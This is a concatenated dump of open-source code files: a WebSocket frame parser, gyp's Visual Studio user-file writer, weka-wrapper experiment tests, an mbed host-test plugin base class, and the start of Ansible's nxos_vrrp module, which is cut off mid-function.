    # wsaccel is not available, we rely on python implementations.
    def _mask(_m, _d):
        """XOR-mask payload *_d* (array('B')) with 4-byte key *_m* (array('B')).

        Each payload byte is XORed with the key byte at index i % 4
        (RFC 6455 masking).  Mutates *_d* in place and returns it as bytes.
        """
        for i in range(len(_d)):
            _d[i] ^= _m[i % 4]

        if six.PY3:
            # array.tostring() was renamed to tobytes() on Python 3.
            return _d.tobytes()
        else:
            return _d.tostring()


# closing frame status codes.
STATUS_NORMAL = 1000
STATUS_GOING_AWAY = 1001
STATUS_PROTOCOL_ERROR = 1002
STATUS_UNSUPPORTED_DATA_TYPE = 1003
STATUS_STATUS_NOT_AVAILABLE = 1005
STATUS_ABNORMAL_CLOSED = 1006
STATUS_INVALID_PAYLOAD = 1007
STATUS_POLICY_VIOLATION = 1008
STATUS_MESSAGE_TOO_BIG = 1009
STATUS_INVALID_EXTENSION = 1010
STATUS_UNEXPECTED_CONDITION = 1011
STATUS_TLS_HANDSHAKE_ERROR = 1015

# Codes acceptable inside a received close frame.  1005, 1006 and 1015 are
# deliberately absent from this tuple.
VALID_CLOSE_STATUS = (
    STATUS_NORMAL,
    STATUS_GOING_AWAY,
    STATUS_PROTOCOL_ERROR,
    STATUS_UNSUPPORTED_DATA_TYPE,
    STATUS_INVALID_PAYLOAD,
    STATUS_POLICY_VIOLATION,
    STATUS_MESSAGE_TOO_BIG,
    STATUS_INVALID_EXTENSION,
    STATUS_UNEXPECTED_CONDITION,
)
class ABNF(object):
    """
    ABNF frame class.
    see http://tools.ietf.org/html/rfc5234
    and http://tools.ietf.org/html/rfc6455#section-5.2
    """

    # operation code values.
    OPCODE_CONT = 0x0
    OPCODE_TEXT = 0x1
    OPCODE_BINARY = 0x2
    OPCODE_CLOSE = 0x8
    OPCODE_PING = 0x9
    OPCODE_PONG = 0xa

    # available operation code value tuple
    OPCODES = (OPCODE_CONT, OPCODE_TEXT, OPCODE_BINARY, OPCODE_CLOSE,
               OPCODE_PING, OPCODE_PONG)

    # opcode human readable string
    OPCODE_MAP = {
        OPCODE_CONT: "cont",
        OPCODE_TEXT: "text",
        OPCODE_BINARY: "binary",
        OPCODE_CLOSE: "close",
        OPCODE_PING: "ping",
        OPCODE_PONG: "pong"
    }

    # data length threshold.
    LENGTH_7 = 0x7e       # payloads below this fit in the 7-bit length field
    LENGTH_16 = 1 << 16   # below this: 16-bit extended length
    LENGTH_63 = 1 << 63   # hard maximum (63-bit length field)

    def __init__(self, fin=0, rsv1=0, rsv2=0, rsv3=0,
                 opcode=OPCODE_TEXT, mask=1, data=""):
        """
        Constructor for ABNF.
        please check RFC for arguments.

        A ``None`` payload is normalized to the empty string.
        ``get_mask_key`` may be overridden by tests to make masking
        deterministic; it defaults to os.urandom.
        """
        self.fin = fin
        self.rsv1 = rsv1
        self.rsv2 = rsv2
        self.rsv3 = rsv3
        self.opcode = opcode
        self.mask = mask
        if data is None:
            data = ""
        self.data = data
        self.get_mask_key = os.urandom

    def validate(self, skip_utf8_validation=False):
        """
        validate the ABNF frame.
        skip_utf8_validation: skip utf8 validation.

        Raises WebSocketProtocolException when the frame violates the
        protocol (reserved bits set, unknown opcode, fragmented ping,
        malformed close frame).
        """
        if self.rsv1 or self.rsv2 or self.rsv3:
            raise WebSocketProtocolException("rsv is not implemented, yet")

        if self.opcode not in ABNF.OPCODES:
            # Fixed: the opcode was previously passed as an extra exception
            # argument ("Invalid opcode %r", self.opcode) and never formatted
            # into the message.
            raise WebSocketProtocolException("Invalid opcode %r" % self.opcode)

        if self.opcode == ABNF.OPCODE_PING and not self.fin:
            raise WebSocketProtocolException("Invalid ping frame.")

        if self.opcode == ABNF.OPCODE_CLOSE:
            l = len(self.data)
            if not l:
                # Empty close payload is legal.
                return
            # A close payload must be a 2-byte status code plus at most
            # 123 bytes of UTF-8 reason text.
            if l == 1 or l >= 126:
                raise WebSocketProtocolException("Invalid close frame.")
            if l > 2 and not skip_utf8_validation and not validate_utf8(self.data[2:]):
                raise WebSocketProtocolException("Invalid close frame.")

            # Big-endian 16-bit status code from the first two bytes.
            code = 256 * six.byte2int(self.data[0:1]) + six.byte2int(self.data[1:2])
            if not self._is_valid_close_status(code):
                raise WebSocketProtocolException("Invalid close opcode.")

    def _is_valid_close_status(self, code):
        # 3000-4999 is the registered/application range allowed by RFC 6455.
        return code in VALID_CLOSE_STATUS or (3000 <= code < 5000)

    def __str__(self):
        return "fin=" + str(self.fin) \
            + " opcode=" + str(self.opcode) \
            + " data=" + str(self.data)

    @staticmethod
    def create_frame(data, opcode, fin=1):
        """
        create frame to send text, binary and other data.

        data: data to send. This is string value(byte array).
            if opcode is OPCODE_TEXT and this value is unicode,
            data value is converted into unicode string, automatically.

        opcode: operation code. please see OPCODE_XXX.

        fin: fin flag. if set to 0, create continue fragmentation.
        """
        if opcode == ABNF.OPCODE_TEXT and isinstance(data, six.text_type):
            data = data.encode("utf-8")
        # mask must be set if send data from client
        return ABNF(fin, 0, 0, 0, opcode, 1, data)

    def format(self):
        """
        format this object to string(byte array) to send data to server.

        Raises ValueError when flags are not 0/1, the opcode is unknown,
        or the payload exceeds the 63-bit length limit.
        """
        if any(x not in (0, 1) for x in [self.fin, self.rsv1, self.rsv2, self.rsv3]):
            raise ValueError("not 0 or 1")
        if self.opcode not in ABNF.OPCODES:
            raise ValueError("Invalid OPCODE")
        length = len(self.data)
        if length >= ABNF.LENGTH_63:
            raise ValueError("data is too long")

        # First header byte: FIN + RSV1-3 + opcode.
        frame_header = chr(self.fin << 7
                           | self.rsv1 << 6 | self.rsv2 << 5 | self.rsv3 << 4
                           | self.opcode)
        # Second byte: mask bit + 7-bit length (or 0x7e/0x7f escape followed
        # by a 16-bit or 64-bit big-endian extended length).
        if length < ABNF.LENGTH_7:
            frame_header += chr(self.mask << 7 | length)
            frame_header = six.b(frame_header)
        elif length < ABNF.LENGTH_16:
            frame_header += chr(self.mask << 7 | 0x7e)
            frame_header = six.b(frame_header)
            frame_header += struct.pack("!H", length)
        else:
            frame_header += chr(self.mask << 7 | 0x7f)
            frame_header = six.b(frame_header)
            frame_header += struct.pack("!Q", length)

        if not self.mask:
            return frame_header + self.data
        else:
            mask_key = self.get_mask_key(4)
            return frame_header + self._get_masked(mask_key)

    def _get_masked(self, mask_key):
        # Wire format: the 4-byte masking key followed by the masked payload.
        s = ABNF.mask(mask_key, self.data)

        if isinstance(mask_key, six.text_type):
            mask_key = mask_key.encode('utf-8')

        return mask_key + s

    @staticmethod
    def mask(mask_key, data):
        """
        mask or unmask data. Just do xor for each byte

        mask_key: 4 byte string(byte).

        data: data to mask/unmask.
        """
        if data is None:
            data = ""

        if isinstance(mask_key, six.text_type):
            mask_key = six.b(mask_key)

        if isinstance(data, six.text_type):
            data = six.b(data)

        _m = array.array("B", mask_key)
        _d = array.array("B", data)
        return _mask(_m, _d)
class frame_buffer(object):
    """Incremental ABNF frame parser over a raw ``recv``-style callable.

    Parsing state (header, length, mask) accumulates across calls so a
    frame can be assembled from many small socket reads.
    """

    # Indices into the parsed ``self.header`` tuple
    # (fin, rsv1, rsv2, rsv3, opcode, has_mask, length_bits).
    _HEADER_MASK_INDEX = 5
    _HEADER_LENGHT_INDEX = 6  # (sic: "LENGHT") index of the 7-bit length bits

    def __init__(self, recv_fn, skip_utf8_validation):
        # recv_fn: callable(bufsize) -> bytes, e.g. socket.recv.
        self.recv = recv_fn
        self.skip_utf8_validation = skip_utf8_validation
        # Buffers over the packets from the layer beneath until desired amount
        # bytes of bytes are received.
        self.recv_buffer = []
        self.clear()

    def clear(self):
        # Reset per-frame parsing state; buffered raw bytes are kept.
        self.header = None
        self.length = None
        self.mask = None

    def has_received_header(self):
        # NOTE: despite the name, this is True when the header has NOT been
        # received yet, i.e. "still needs a header" (see recv_frame usage).
        return self.header is None

    def recv_header(self):
        # Read the fixed 2-byte frame header and unpack its bit fields.
        header = self.recv_strict(2)
        b1 = header[0]

        if six.PY2:
            b1 = ord(b1)

        fin = b1 >> 7 & 1
        rsv1 = b1 >> 6 & 1
        rsv2 = b1 >> 5 & 1
        rsv3 = b1 >> 4 & 1
        opcode = b1 & 0xf
        b2 = header[1]

        if six.PY2:
            b2 = ord(b2)

        has_mask = b2 >> 7 & 1
        length_bits = b2 & 0x7f

        self.header = (fin, rsv1, rsv2, rsv3, opcode, has_mask, length_bits)

    def has_mask(self):
        # False until a header has been parsed.
        if not self.header:
            return False
        return self.header[frame_buffer._HEADER_MASK_INDEX]

    def has_received_length(self):
        # True when the payload length has NOT been determined yet.
        return self.length is None

    def recv_length(self):
        # 0x7e -> 16-bit extended length follows; 0x7f -> 64-bit; otherwise
        # the 7 bits themselves are the payload length.
        bits = self.header[frame_buffer._HEADER_LENGHT_INDEX]
        length_bits = bits & 0x7f
        if length_bits == 0x7e:
            v = self.recv_strict(2)
            self.length = struct.unpack("!H", v)[0]
        elif length_bits == 0x7f:
            v = self.recv_strict(8)
            self.length = struct.unpack("!Q", v)[0]
        else:
            self.length = length_bits

    def has_received_mask(self):
        # True when the masking key has NOT been read yet.
        return self.mask is None

    def recv_mask(self):
        # 4-byte masking key, or "" when the frame is unmasked.
        self.mask = self.recv_strict(4) if self.has_mask() else ""

    def recv_frame(self):
        # Drive the state machine: header -> length -> mask -> payload,
        # then validate and return one complete ABNF frame.

        # Header
        if self.has_received_header():
            self.recv_header()
        (fin, rsv1, rsv2, rsv3, opcode, has_mask, _) = self.header

        # Frame length
        if self.has_received_length():
            self.recv_length()
        length = self.length

        # Mask
        if self.has_received_mask():
            self.recv_mask()
        mask = self.mask

        # Payload
        payload = self.recv_strict(length)
        if has_mask:
            payload = ABNF.mask(mask, payload)

        # Reset for next frame
        self.clear()

        frame = ABNF(fin, rsv1, rsv2, rsv3, opcode, has_mask, payload)
        frame.validate(self.skip_utf8_validation)

        return frame

    def recv_strict(self, bufsize):
        # Return exactly bufsize bytes, pulling from the network as needed;
        # surplus bytes stay in recv_buffer for the next call.
        shortage = bufsize - sum(len(x) for x in self.recv_buffer)
        while shortage > 0:
            # Limit buffer size that we pass to socket.recv() to avoid
            # fragmenting the heap -- the number of bytes recv() actually
            # reads is limited by socket buffer and is relatively small,
            # yet passing large numbers repeatedly causes lots of large
            # buffers allocated and then shrunk, which results in fragmentation.
            bytes = self.recv(min(16384, shortage))  # shadows builtin 'bytes'
            self.recv_buffer.append(bytes)
            shortage -= len(bytes)

        unified = six.b("").join(self.recv_buffer)

        if shortage == 0:
            self.recv_buffer = []
            return unified
        else:
            self.recv_buffer = [unified[bufsize:]]
            return unified[:bufsize]
class continuous_frame(object):
    """Reassembles fragmented websocket messages (TEXT/BINARY followed by
    CONT frames) into a single payload.

    fire_cont_frame: when true, every fragment is surfaced to the caller
    instead of only the reassembled message.
    """

    def __init__(self, fire_cont_frame, skip_utf8_validation):
        self.fire_cont_frame = fire_cont_frame
        self.skip_utf8_validation = skip_utf8_validation
        # [initial opcode, accumulated payload] while a message is open.
        self.cont_data = None
        # Opcode of the in-progress fragmented message, else None.
        self.recving_frames = None

    def validate(self, frame):
        """Reject illegal fragmentation sequences."""
        in_progress = bool(self.recving_frames)
        # A CONT frame with no message in progress is a protocol error.
        if frame.opcode == ABNF.OPCODE_CONT and not in_progress:
            raise WebSocketProtocolException("Illegal frame")
        # Starting a new data message while one is in progress is too.
        if in_progress and frame.opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
            raise WebSocketProtocolException("Illegal frame")

    def add(self, frame):
        """Accumulate a fragment; close the message on its FIN frame."""
        if self.cont_data is None:
            # First fragment: remember the opening opcode for data frames.
            if frame.opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
                self.recving_frames = frame.opcode
            self.cont_data = [frame.opcode, frame.data]
        else:
            self.cont_data[1] += frame.data

        if frame.fin:
            self.recving_frames = None

    def is_fire(self, frame):
        """True when the accumulated data should be handed to the caller."""
        return self.fire_cont_frame or bool(frame.fin)

    def extract(self, frame):
        """Return [opcode, frame] with the reassembled payload on *frame*."""
        opcode, payload = self.cont_data
        self.cont_data = None
        frame.data = payload

        needs_utf8_check = (
            not self.fire_cont_frame
            and opcode == ABNF.OPCODE_TEXT
            and not self.skip_utf8_validation
        )
        if needs_utf8_check and not validate_utf8(frame.data):
            raise WebSocketPayloadException("cannot decode: " + repr(frame.data))

        return [opcode, frame]
| mit |
A-HostMobile/MobileApp | node_modules/node-gyp/gyp/pylib/gyp/MSVSUserFile.py | 2710 | 5094 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Visual Studio user preferences file writer."""
import os
import re
import socket # for gethostname
import gyp.common
import gyp.easy_xml as easy_xml
#------------------------------------------------------------------------------
def _FindCommandInPath(command):
"""If there are no slashes in the command given, this function
searches the PATH env to find the given command, and converts it
to an absolute path. We have to do this because MSVS is looking
for an actual file to launch a debugger on, not just a command
line. Note that this happens at GYP time, so anything needing to
be built needs to have a full path."""
if '/' in command or '\\' in command:
# If the command already has path elements (either relative or
# absolute), then assume it is constructed properly.
return command
else:
# Search through the path list and find an existing file that
# we can access.
paths = os.environ.get('PATH','').split(os.pathsep)
for path in paths:
item = os.path.join(path, command)
if os.path.isfile(item) and os.access(item, os.X_OK):
return item
return command
def _QuoteWin32CommandLineArgs(args):
new_args = []
for arg in args:
# Replace all double-quotes with double-double-quotes to escape
# them for cmd shell, and then quote the whole thing if there
# are any.
if arg.find('"') != -1:
arg = '""'.join(arg.split('"'))
arg = '"%s"' % arg
# Otherwise, if there are any spaces, quote the whole arg.
elif re.search(r'[ \t\n]', arg):
arg = '"%s"' % arg
new_args.append(arg)
return new_args
class Writer(object):
  """Visual Studio XML user file (.user) writer."""

  def __init__(self, user_file_path, version, name):
    """Initializes the user file.

    Args:
      user_file_path: Path to the user file.
      version: Version info object (must provide ProjectVersion()).
      name: Name of the user file.
    """
    self.user_file_path = user_file_path
    self.version = version
    self.name = name
    # Maps configuration name -> easy_xml specification
    # (['Configuration', {'Name': name}, ...child nodes...]).
    self.configurations = {}

  def AddConfig(self, name):
    """Adds a configuration to the project.

    Args:
      name: Configuration name.
    """
    self.configurations[name] = ['Configuration', {'Name': name}]

  def AddDebugSettings(self, config_name, command, environment=None,
                       working_directory=""):
    """Adds a DebugSettings node to the user file for a particular config.

    Args:
      config_name: Name of the configuration the settings belong to; it is
          added automatically if it does not exist yet.
      command: command line to run. First element in the list is the
          executable. All elements of the command will be quoted if
          necessary.
      environment: dict of environment variables for the debuggee
          (optional).  Note: previously defaulted to a shared mutable {}.
      working_directory: working directory for the debuggee (optional).
    """
    command = _QuoteWin32CommandLineArgs(command)

    abs_command = _FindCommandInPath(command[0])

    if environment and isinstance(environment, dict):
      # Render the environment as space-separated KEY="value" pairs.
      env_list = ['%s="%s"' % (key, val)
                  for (key, val) in environment.items()]
      environment = ' '.join(env_list)
    else:
      environment = ''

    n_cmd = ['DebugSettings',
             {'Command': abs_command,
              'WorkingDirectory': working_directory,
              'CommandArguments': " ".join(command[1:]),
              'RemoteMachine': socket.gethostname(),
              'Environment': environment,
              'EnvironmentMerge': 'true',
              # Currently these are all "dummy" values that we're just setting
              # in the default manner that MSVS does it. We could use some of
              # these to add additional capabilities, I suppose, but they might
              # not have parity with other platforms then.
              'Attach': 'false',
              'DebuggerType': '3',  # 'auto' debugger
              'Remote': '1',
              'RemoteCommand': '',
              'HttpUrl': '',
              'PDBPath': '',
              'SQLDebugging': '',
              'DebuggerFlavor': '0',
              'MPIRunCommand': '',
              'MPIRunArguments': '',
              'MPIRunWorkingDirectory': '',
              'ApplicationCommand': '',
              'ApplicationArguments': '',
              'ShimCommand': '',
              'MPIAcceptMode': '',
              'MPIAcceptFilter': ''
             }]

    # Find the config, and add it if it doesn't exist.
    if config_name not in self.configurations:
      self.AddConfig(config_name)

    # Add the DebugSettings onto the appropriate config.
    self.configurations[config_name].append(n_cmd)

  def WriteIfChanged(self):
    """Writes the user file, only touching disk if the content changed."""
    configs = ['Configurations']
    # Deterministic output: emit configurations sorted by name.
    for _name, spec in sorted(self.configurations.items()):
      configs.append(spec)

    content = ['VisualStudioUserFile',
               {'Version': self.version.ProjectVersion(),
                'Name': self.name
               },
               configs]
    easy_xml.WriteXmlIfChanged(content, self.user_file_path,
                               encoding="Windows-1252")
| apache-2.0 |
fracpete/python-weka-wrapper | tests/wekatests/experiments.py | 2 | 8264 | # This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# experiments.py
# Copyright (C) 2014-2018 Fracpete (pythonwekawrapper at gmail dot com)
import unittest
import weka.core.jvm as jvm
import weka.core.converters as converters
import weka.experiments as experiments
import weka.classifiers as classifiers
import wekatests.tests.weka_test as weka_test
class TestExperiments(weka_test.WekaTest):
    """Tests for weka.experiments: running cross-validation / random-split
    experiments and evaluating them with ResultMatrix + Tester.

    NOTE(review): the experiment setup/evaluation code is duplicated across
    the three test methods; a shared helper would cut the repetition.
    """

    def test_crossvalidation_classification(self):
        """
        Tests cross-validated classification.
        """
        # Two nominal-class datasets, comparing a baseline vs. a tree learner.
        datasets = [self.datafile("iris.arff"), self.datafile("anneal.arff")]
        cls = [
            classifiers.Classifier(classname="weka.classifiers.rules.ZeroR"),
            classifiers.Classifier(classname="weka.classifiers.trees.J48")]
        outfile = self.tempfile("results-cv.arff")
        exp = experiments.SimpleCrossValidationExperiment(
            classification=True,
            runs=10,
            folds=10,
            datasets=datasets,
            classifiers=cls,
            result=outfile)
        self.assertIsNotNone(exp, msg="Failed to instantiate!")
        exp.setup()
        exp.run()

        # evaluate: load the generated results and run a corrected t-test.
        loader = converters.loader_for_file(outfile)
        data = loader.load_file(outfile)
        self.assertIsNotNone(data, msg="Failed to load data: " + outfile)

        matrix = experiments.ResultMatrix(classname="weka.experiment.ResultMatrixPlainText")
        self.assertIsNotNone(matrix, msg="Failed to instantiate!")
        tester = experiments.Tester(classname="weka.experiment.PairedCorrectedTTester")
        self.assertIsNotNone(tester, msg="Failed to instantiate!")
        tester.resultmatrix = matrix
        comparison_col = data.attribute_by_name("Percent_correct").index
        tester.instances = data
        # Only checks that header/result text is produced, not its content.
        self.assertGreater(len(tester.header(comparison_col)), 0, msg="Generated no header")
        self.assertGreater(len(tester.multi_resultset_full(0, comparison_col)), 0, msg="Generated no result")

    def test_randomsplit_regression(self):
        """
        Tests random split on regression.
        """
        # Two numeric-class datasets, comparing a baseline vs. regression.
        datasets = [self.datafile("bolts.arff"), self.datafile("bodyfat.arff")]
        cls = [
            classifiers.Classifier(classname="weka.classifiers.rules.ZeroR"),
            classifiers.Classifier(classname="weka.classifiers.functions.LinearRegression")
        ]
        outfile = self.tempfile("results-rs.arff")
        exp = experiments.SimpleRandomSplitExperiment(
            classification=False,
            runs=10,
            percentage=66.6,
            preserve_order=False,
            datasets=datasets,
            classifiers=cls,
            result=outfile)
        self.assertIsNotNone(exp, msg="Failed to instantiate!")
        exp.setup()
        exp.run()

        # evaluate: regression quality is compared via correlation coefficient.
        loader = converters.loader_for_file(outfile)
        data = loader.load_file(outfile)
        self.assertIsNotNone(data, msg="Failed to load data: " + outfile)

        matrix = experiments.ResultMatrix(classname="weka.experiment.ResultMatrixPlainText")
        self.assertIsNotNone(matrix, msg="Failed to instantiate!")
        tester = experiments.Tester(classname="weka.experiment.PairedCorrectedTTester")
        self.assertIsNotNone(tester, msg="Failed to instantiate!")
        tester.resultmatrix = matrix
        comparison_col = data.attribute_by_name("Correlation_coefficient").index
        tester.instances = data
        self.assertGreater(len(tester.header(comparison_col)), 0, msg="Generated no header")
        self.assertGreater(len(tester.multi_resultset_full(0, comparison_col)), 0, msg="Generated no result")

    def test_result_matrix(self):
        """
        Tests the ResultMatrix class.
        """
        # Re-runs the cross-validation experiment to obtain a filled matrix.
        datasets = [self.datafile("iris.arff"), self.datafile("anneal.arff")]
        cls = [
            classifiers.Classifier(classname="weka.classifiers.rules.ZeroR"),
            classifiers.Classifier(classname="weka.classifiers.trees.J48")]
        outfile = self.tempfile("results-cv.arff")
        exp = experiments.SimpleCrossValidationExperiment(
            classification=True,
            runs=10,
            folds=10,
            datasets=datasets,
            classifiers=cls,
            result=outfile)
        self.assertIsNotNone(exp, msg="Failed to instantiate!")
        exp.setup()
        exp.run()

        # evaluate
        loader = converters.loader_for_file(outfile)
        data = loader.load_file(outfile)
        self.assertIsNotNone(data, msg="Failed to load data: " + outfile)

        matrix = experiments.ResultMatrix(classname="weka.experiment.ResultMatrixPlainText")
        self.assertIsNotNone(matrix, msg="Failed to instantiate!")
        tester = experiments.Tester(classname="weka.experiment.PairedCorrectedTTester")
        self.assertIsNotNone(tester, msg="Failed to instantiate!")
        tester.resultmatrix = matrix
        comparison_col = data.attribute_by_name("Percent_correct").index
        tester.instances = data
        self.assertGreater(len(tester.header(comparison_col)), 0, msg="Generated no header")
        self.assertGreater(len(tester.multi_resultset_full(0, comparison_col)), 0, msg="Generated no result")

        # dimensions: 2 datasets x 2 classifiers
        self.assertEqual(2, matrix.rows, msg="# of rows differ")
        # NOTE(review): msg text says "rows" but this checks the columns.
        self.assertEqual(2, matrix.columns, msg="# of rows differ")

        # cols: hide/show toggling of classifier columns
        #self.assertTrue(matrix.get_col_name(0).find("ZeroR") > -1, msg="ZeroR should be part of col name")
        #self.assertTrue(matrix.get_col_name(1).find("J48") > -1, msg="J48 should be part of col name")
        #self.assertIsNone(matrix.get_col_name(2), msg="Column name should not exist")
        #matrix.set_col_name(0, "zeror")
        #self.assertTrue(matrix.get_col_name(0).find("zeror") > -1, msg="zeror should be part of col name")
        self.assertFalse(matrix.is_col_hidden(1), msg="Column should be visible")
        matrix.hide_col(1)
        self.assertTrue(matrix.is_col_hidden(1), msg="Column should be hidden")
        matrix.show_col(1)
        self.assertFalse(matrix.is_col_hidden(1), msg="Column should be visible again")

        # rows: hide/show toggling of dataset rows
        #self.assertEqual("iris", matrix.get_row_name(0), msg="Row names differ")
        #self.assertEqual("anneal", matrix.get_row_name(1), msg="Row names differ")
        #self.assertIsNone(matrix.get_col_name(2), msg="Row name should not exist")
        #matrix.set_row_name(0, "IRIS")
        #self.assertEqual("IRIS", matrix.get_row_name(0), msg="Row names differ")
        self.assertFalse(matrix.is_row_hidden(1), msg="Row should be visible")
        matrix.hide_row(1)
        self.assertTrue(matrix.is_row_hidden(1), msg="Row should be hidden")
        matrix.show_row(1)
        self.assertFalse(matrix.is_row_hidden(1), msg="Row should be visible again")

        # mean: getter/setter round-trip on cell (0, 0)
        self.assertAlmostEqual(33.3, matrix.get_mean(0, 0), places=1, msg="Means differ")
        self.assertAlmostEqual(54.75, matrix.average(0), places=2, msg="Averages differ")
        matrix.set_mean(0, 0, 10)
        self.assertAlmostEqual(10.0, matrix.get_mean(0, 0), places=1, msg="Means differ")

        # stdev: getter/setter round-trip on cell (0, 0)
        self.assertAlmostEqual(0.0, matrix.get_stdev(0, 0), places=1, msg="Means differ")
        matrix.set_stdev(0, 0, 0.3)
        self.assertAlmostEqual(0.3, matrix.get_stdev(0, 0), places=1, msg="Means differ")
def suite():
    """
    Returns the test suite.

    :return: the test suite
    :rtype: unittest.TestSuite
    """
    loader = unittest.TestLoader()
    return loader.loadTestsFromTestCase(TestExperiments)
# Script entry point: the JVM must be running for any weka call to work.
if __name__ == '__main__':
    jvm.start()
    unittest.TextTestRunner().run(suite())
    jvm.stop()
| gpl-3.0 |
j-greffe/mbed-os | tools/host_tests/host_tests_plugins/host_test_plugins.py | 92 | 4881 | """
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from os import access, F_OK
from sys import stdout
from time import sleep
from subprocess import call
class HostTestPluginBase:
""" Base class for all plug-ins used with host tests.
"""
###########################################################################
# Interface:
###########################################################################
###########################################################################
# Interface attributes defining plugin name, type etc.
###########################################################################
name = "HostTestPluginBase" # Plugin name, can be plugin class name
type = "BasePlugin" # Plugin type: ResetMethod, Copymethod etc.
capabilities = [] # Capabilities names: what plugin can achieve
# (e.g. reset using some external command line tool)
stable = False # Determine if plugin is stable and can be used
###########################################################################
# Interface methods
###########################################################################
def setup(self, *args, **kwargs):
""" Configure plugin, this function should be called before plugin execute() method is used.
"""
return False
def execute(self, capabilitity, *args, **kwargs):
""" Executes capability by name.
Each capability e.g. may directly just call some command line
program or execute building pythonic function
"""
return False
###########################################################################
# Interface helper methods - overload only if you need to have custom behaviour
###########################################################################
def print_plugin_error(self, text):
""" Function prints error in console and exits always with False
"""
print "Plugin error: %s::%s: %s"% (self.name, self.type, text)
return False
def print_plugin_info(self, text, NL=True):
""" Function prints notification in console and exits always with True
"""
if NL:
print "Plugin info: %s::%s: %s"% (self.name, self.type, text)
else:
print "Plugin info: %s::%s: %s"% (self.name, self.type, text),
return True
def print_plugin_char(self, char):
""" Function prints char on stdout
"""
stdout.write(char)
stdout.flush()
return True
def check_mount_point_ready(self, destination_disk, init_delay=0.2, loop_delay=0.25):
""" Checks if destination_disk is ready and can be accessed by e.g. copy commands
@init_delay - Initial delay time before first access check
@loop_delay - pooling delay for access check
"""
if not access(destination_disk, F_OK):
self.print_plugin_info("Waiting for mount point '%s' to be ready..."% destination_disk, NL=False)
sleep(init_delay)
while not access(destination_disk, F_OK):
sleep(loop_delay)
self.print_plugin_char('.')
def check_parameters(self, capabilitity, *args, **kwargs):
""" This function should be ran each time we call execute()
to check if none of the required parameters is missing.
"""
missing_parameters = []
for parameter in self.required_parameters:
if parameter not in kwargs:
missing_parameters.append(parameter)
if len(missing_parameters) > 0:
self.print_plugin_error("execute parameter(s) '%s' missing!"% (', '.join(parameter)))
return False
return True
def run_command(self, cmd, shell=True):
    """Run *cmd* through subprocess and report success.

    :param cmd: command line to execute
    :param shell: forwarded to subprocess (run through the shell by default)
    :return: True when the command exits with status 0, False otherwise
    """
    exit_code = 0
    try:
        exit_code = call(cmd, shell=shell)
    except Exception as exc:
        # call() itself failed (e.g. OSError) before producing a status.
        self.print_plugin_error("[ret=%d] Command: %s"% (int(exit_code), cmd))
        self.print_plugin_error(str(exc))
        return False
    if exit_code:
        self.print_plugin_error("[ret=%d] Command: %s"% (int(exit_code), cmd))
        return False
    return True
| apache-2.0 |
walbert947/ansible-modules-core | network/nxos/nxos_vrrp.py | 10 | 13515 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = '''
---
module: nxos_vrrp
version_added: "2.1"
short_description: Manages VRRP configuration on NX-OS switches
description:
- Manages VRRP configuration on NX-OS switches
extends_documentation_fragment: nxos
author: Jason Edelman (@jedelman8), Gabriele Gerbino (@GGabriele)
notes:
- VRRP feature needs to be enabled first on the system
- SVIs must exist before using this module
- Interface must be a L3 port before using this module
- state=absent removes the vrrp group if it exists on the device
- VRRP cannot be configured on loopback interfaces
options:
group:
description:
- vrrp group number
required: true
interface:
description:
- Full name of interface that is being managed for vrrp
required: true
priority:
description:
- vrrp priority
required: false
default: null
vip:
description:
- vrrp virtual IP address
required: false
default: null
authentication:
description:
- clear text authentication string
required: false
default: null
state:
description:
- Specify desired state of the resource
required: false
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
# ensure vrrp group 100 and vip 10.1.100.1 is on vlan10
- nxos_vrrp: interface=vlan10 group=100 vip=10.1.100.1 host={{ inventory_hostname }}
# ensure removal of the vrrp group config # vip is required to ensure the user knows what they are removing
- nxos_vrrp: interface=vlan10 group=100 vip=10.1.100.1 state=absent host={{ inventory_hostname }}
# re-config with more params
- nxos_vrrp: interface=vlan10 group=100 vip=10.1.100.1 preempt=false priority=130 authentication=AUTHKEY host={{ inventory_hostname }}
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"authentication": "testing", "group": "150", "vip": "10.1.15.1"}
existing:
description: k/v pairs of existing vrrp info on the interface
type: dict
sample: {}
end_state:
description: k/v pairs of vrrp after module execution
returned: always
type: dict
sample: {"authentication": "testing", "group": "150", "interval": "1",
"preempt": true, "priority": "100", "vip": "10.1.15.1"}
state:
description: state as sent in from the playbook
returned: always
type: string
sample: "present"
updates:
description: commands sent to the device
returned: always
type: list
sample: ["interface vlan10", "vrrp 150", "address 10.1.15.1",
"authentication text testing"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
def execute_config_command(commands, module):
    """Push a list of config commands to the device, failing the Ansible
    module on any transport error.

    :param commands: list of CLI configuration commands
    :param module: module object providing configure() and fail_json()
    """
    try:
        module.configure(commands)
    except ShellError as clie:
        # 'except X as e' is valid on Python 2.6+ and Python 3; the original
        # comma form was Python-2 only.
        module.fail_json(msg='Error sending CLI commands',
